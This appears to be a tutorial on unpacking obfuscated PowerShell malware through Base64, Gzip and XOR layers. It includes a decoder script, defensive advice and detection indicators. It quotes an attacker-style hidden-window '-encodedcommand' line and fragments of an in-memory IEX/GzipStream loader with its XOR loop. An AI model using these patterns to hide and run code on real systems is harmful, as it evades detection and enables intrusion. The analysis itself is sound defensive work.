Decoding Obfuscated PowerShell Code
Word count: 1012 | 2025-08-05 00:16:39

Tutorial: The Decoding Process for Obfuscated PowerShell Code

1. Overview of PowerShell Obfuscation Techniques

PowerShell obfuscation is commonly used to evade security detection. The main techniques are:

  • Encoding: hiding the real code behind Base64, Gzip and similar encodings
  • String splitting: breaking a command into multiple fragments
  • Variable substitution: replacing sensitive strings with randomly named variables
  • Encryption: applying simple ciphers such as XOR

Microsoft added logging features to newer PowerShell versions (such as Transcription and ScriptBlock logging), which has pushed attackers toward more complex obfuscation.

2. Key Command-Line Parameters

  • -nop: do not load the PowerShell profile
  • -w hidden: hide the execution window
  • -encodedcommand: execute a Base64-encoded command

3. The Decoding Process in Detail

3.1 Initial Base64 Decoding

Example attack command:

powershell -nop -w hidden -encodedcommand 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

Decoding method:

# -encodedcommand is Base64 over UTF-16LE text, so convert the decoded bytes
# to UTF-8 or the output shows a NUL byte after every character.
# GNU coreutils uses -d; the macOS base64 tool uses -D.
echo -n "JABzAD0ATgBlAHcALQBPAGIAagBlAGM..." | base64 -d | iconv -f UTF-16LE -t UTF-8

3.2 Gzip Decompression

After decoding, the result contains Gzip-compressed data (recognisable by the H4sIAAAA prefix):

# $s holds the raw gzip bytes; the GzipStream inflates them and IEX runs
# the resulting text as the next-stage PowerShell script
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAA..."))
IEX (New-Object IO.StreamReader(
    New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress)
)).ReadToEnd()

Decompression method:

# gunzip reads the gzip header (1f 8b 08), which is what Base64 renders as "H4sI"
echo -n "H4sIAAAA..." | base64 -d | gunzip

3.3 XOR Decryption

After decompression you may encounter XOR-encrypted shellcode:

# Stage-3 payload: Base64-decoded bytes XORed with the single-byte key 35 (0x23)
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMj...')
for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

Decryption steps:

  1. Step through the script in PowerShell ISE
  2. Write the decrypted bytes to a file for further analysis:

[System.IO.File]::WriteAllBytes("C:\decrypted.bin", $var_code)
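To tie sections 3.1 to 3.3 together, here is an added Python decoder (not from the original post) that unwraps all three layers in one pass: UTF-16LE Base64, then the H4sI gzip blob, then the -bxor loop. The sample it decodes is constructed inside the script with a harmless placeholder in place of shellcode, and the FromBase64String/-bxor patterns it matches are the ones shown above.

```python
import base64, gzip, re

XOR_KEY = 35  # the -bxor 35 key used by the stage-3 loop in the sample


def decode_encoded_command(arg: str) -> str:
    """Stage 1: -encodedcommand is Base64 over UTF-16LE text, so decode both."""
    return base64.b64decode(arg).decode("utf-16-le")


def decode_gzip_stage(stage1: str) -> str:
    """Stage 2: pull the H4sI... blob out of FromBase64String("...") and gunzip it."""
    m = re.search(r'FromBase64String\("(H4sI[A-Za-z0-9+/=]+)"\)', stage1)
    if not m:
        raise ValueError("no gzip-compressed Base64 blob found in stage 1")
    return gzip.decompress(base64.b64decode(m.group(1))).decode("utf-8")


def decode_xor_stage(stage2: str) -> bytes:
    """Stage 3: locate the Base64 byte array and the -bxor key, then undo the XOR."""
    blob = re.search(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", stage2)
    key = re.search(r"-bxor\s+(\d+)", stage2)
    if not blob or not key:
        raise ValueError("no XOR stage found in stage 2")
    k = int(key.group(1))
    return bytes(b ^ k for b in base64.b64decode(blob.group(1)))


def unwrap(encoded_command: str) -> bytes:
    """Run all three stages and return the final payload bytes."""
    return decode_xor_stage(decode_gzip_stage(decode_encoded_command(encoded_command)))


# Constructed lab sample (NOT shellcode): the same three layers the page walks through.
FAKE_PAYLOAD = b"CONSTRUCTED-SAMPLE-PAYLOAD-NOT-SHELLCODE"


def build_sample() -> str:
    xored = bytes(b ^ XOR_KEY for b in FAKE_PAYLOAD)
    stage2 = ("[Byte[]]$var_code = [System.Convert]::FromBase64String('%s')\n"
              "for ($x = 0; $x -lt $var_code.Count; $x++) { $var_code[$x] = $var_code[$x] -bxor 35 }\n"
              % base64.b64encode(xored).decode())
    gz = base64.b64encode(gzip.compress(stage2.encode())).decode()  # starts with "H4sI"
    stage1 = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"))\n'
              "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
              "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()" % gz)
    return base64.b64encode(stage1.encode("utf-16-le")).decode()  # starts with "JABz" ("$s=")


if __name__ == "__main__":
    print(unwrap(build_sample()))
```

On a real sample, pass the string that follows -encodedcommand to unwrap() and write the returned bytes to disk instead of printing them.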

4. Analysis of the Full Attack Chain

  1. Initial execution: a Base64-encoded command is run via -encodedcommand
  2. In-memory loading: the second-layer Base64 data is loaded with IO.MemoryStream
  3. Decompression: Gzip decompression yields the actual PowerShell script
  4. Shellcode decryption: the final payload is XOR-decrypted
  5. In-memory execution: the shellcode is executed in memory via VirtualAlloc and CreateDelegate

5. Defensive Recommendations

  • Enable PowerShell logging (ScriptBlock logging and module logging)
  • Restrict use of the -encodedcommand parameter
  • Monitor for anomalous process creation (for example powershell.exe spawning child processes)
  • Use AMSI to detect malicious scripts

6. Recommended Tools

  • PowerShell ISE: for debugging and analysing scripts
  • CyberChef: online decoding of Base64/Gzip data
  • Process Monitor: monitoring process behaviour

Appendix: Common Obfuscation Indicators

  1. Long Base64 strings
  2. Presence of FromBase64String and GzipStream
  3. Use of bitwise operators such as -bxor
  4. Calls to memory-manipulation APIs such as VirtualAlloc

Following these steps fully recovers the attacker's payload, from which key information such as the C2 address can be extracted.
